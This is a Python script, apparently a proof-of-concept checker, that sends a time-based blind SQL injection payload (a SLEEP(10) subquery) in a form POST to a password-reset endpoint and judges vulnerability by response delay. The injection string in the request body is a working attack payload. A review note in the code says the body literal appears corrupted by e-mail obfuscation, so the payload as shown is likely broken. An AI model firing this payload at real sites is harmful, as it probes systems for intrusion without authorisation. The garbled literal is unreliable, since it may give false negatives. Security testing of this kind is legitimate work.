#!/usr/bin/python
# Usage:
#   python3 V-24-02-001_SQLi_Check.py --url https://domain.com
import requests
import time
import uuid
import argparse
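# Silence the InsecureRequestWarning that urllib3 emits for every request made
# with verify=False (check_vulnerability sends its POST that way). This only
# hides the warning; certificate validation stays disabled for that request.
# The file never imports urllib3 by name, so the bare `urllib3.` reference
# raised NameError at import time; reach the module through requests instead.
requests.packages.urllib3.disable_warnings(
    requests.packages.urllib3.exceptions.InsecureRequestWarning
)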
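def check_vulnerability(url, data, headers):
    """Send one timed POST and print a verdict based on how long it took.

    The caller supplies a request body that asks the database to sleep for
    10 seconds; a response slower than 9 seconds is reported as vulnerable.

    The verdict rests on timing alone, so read it with care:
    a slow server or network path also produces "[+] VULNERABLE", and
    "[-] NOT VULNERABLE" is printed for any fast response, including error
    pages or a request that never reached the intended handler. The HTTP
    status and elapsed time are printed so the result can be judged in context.

    Args:
        url: Address the POST is sent to.
        data: Pre-encoded form body, sent as-is.
        headers: Mapping of HTTP request headers.

    Returns:
        None. The outcome is printed to stdout.
    """
    print("[+] Checking endpoint!")

    # Must stay well above the 10 s delay the body requests; a shorter timeout
    # would abort exactly the delayed response this check is looking for.
    # Without any timeout the call can block forever on an unresponsive host.
    request_timeout = 30

    # monotonic() is unaffected by wall-clock adjustments during the wait.
    started = time.monotonic()
    try:
        # NOTE(review): verify=False accepts any certificate, so the peer that
        # answers is not authenticated; keep that in mind when trusting the result.
        response = requests.post(
            url,
            data=data,
            headers=headers,
            verify=False,
            timeout=request_timeout,
        )
    except requests.exceptions.RequestException as exc:
        # Connection errors and timeouts say nothing about the endpoint itself.
        print(f"[!] Request failed, result inconclusive: {exc}")
        return
    response_time = time.monotonic() - started

    print(f"[*] HTTP {response.status_code} after {response_time:.1f}s")

    # Threshold sits one second under the requested 10 s delay to allow for
    # timer slack; anything slower than this for unrelated reasons is a
    # false positive.
    if response_time > 9:
        print("[+] VULNERABLE")
    else:
        print("[-] NOT VULNERABLE")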
def main():
    """Read ``--url`` from the command line and run the timing check on it.

    The request body and headers are fixed; only the target comes from the
    caller. The same ``url`` value is used as the POST target, as the
    ``Origin`` header and as the prefix of the ``Referer`` header.
    """
    parser = argparse.ArgumentParser(
        description='Check if an endpoint is vulnerable to a SQL injection attack.'
    )
    parser.add_argument(
        '--url',
        required=True,
        help='URL of the endpoint to check',
    )
    url = parser.parse_args().url

    # Form body carrying a 10 second deliberate delay.
    # NOTE(review): the "[email protected]" fragment looks like the placeholder
    # that e-mail obfuscation on the hosting page leaves behind, so this literal
    # is probably not the author's original body. Compare against the original
    # script before trusting a "NOT VULNERABLE" result.
    body = "data%5Bemail%[email protected]'+AND+(SELECT+8161+FROM+(SELECT(SLEEP(10)))uvHC)+AND+'abcd'%3d'abcd"

    # A fresh random PHPSESSID is generated on every run.
    session_cookie = f"pma_lang=en; PHPSESSID={uuid.uuid4().hex}"
    # NOTE(review): if --url already carries a path or trailing slash, Origin
    # and Referer are built from it unchanged. Confirm whether a bare site
    # root or the full endpoint is expected here.
    referer = f"{url}/auth/password-reset-token.php"

    request_headers = {
        "Cookie": session_cookie,
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36",
        "Origin": url,
        "Referer": referer,
        "Accept-Encoding": "gzip, deflate, br",
        "Accept-Language": "en-US,en;q=0.9",
        "Connection": "close",
    }

    check_vulnerability(url, body, request_headers)
# Run the check only when executed as a script, so importing this module
# never sends a request.
if __name__ == "__main__":
    main()